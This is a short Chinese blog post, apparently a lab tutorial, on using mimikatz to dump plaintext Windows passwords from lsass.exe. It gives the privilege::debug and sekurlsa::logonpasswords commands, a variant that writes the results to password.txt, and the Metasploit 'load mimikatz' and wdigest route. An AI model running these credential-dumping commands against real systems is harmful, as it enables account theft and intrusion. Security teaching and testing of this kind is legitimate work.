1701天 博客通用头像 Edwiin

本人熟练掌握linux,windows的开关机,擅长nfs,samba,ftp,dhcp,bind,apache,mail等各项服务的安装与卸载,精通shell,mysql,iptables,selinux等单词的拼写,了解虚拟化,存储,集群等相关汉字的书写。

神器mimikatz使用之读取密码

发布于 5个月前 / 82 次围观 / 0 条评论 / 技术学习 / Edwiin
本文最后更新于2020-5-13,已超过 1 个月没有更新,如果文章内容或图片资源失效,请【留言反馈】,我会及时处理,谢谢!

mimikatz介绍

mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。

mimikatz下载安装

实验环境

 2008 Server R2

mimikatz还支持以下系统

Windows XP (部分可以)
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7
Windows 7 SP1

使用

运行mimikatz.exe 需要用管理权限运行

分别输入 privilege::debug 和 sekurlsa::logonpasswords

然后下来我们可以看到已经获取到明文密码

不管密码多么复杂都能抓出来

原因是在llsass中,明文密码经过加密算法的密文 (这个加密算法是可逆的 能被解密出明文)

也可以用 mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> password.txt 命令来导出到本地文件。

msf建立连接后也可以使用mimikatz输入load mimikatz 然后输入wdigest就可以获取明文密码

全站顶部广告位

  • 支付宝赞助图片
  • 微信赞助图片
  • QQ赞助图片
头像
描述: 还好有你,再见如初。

Press Space to start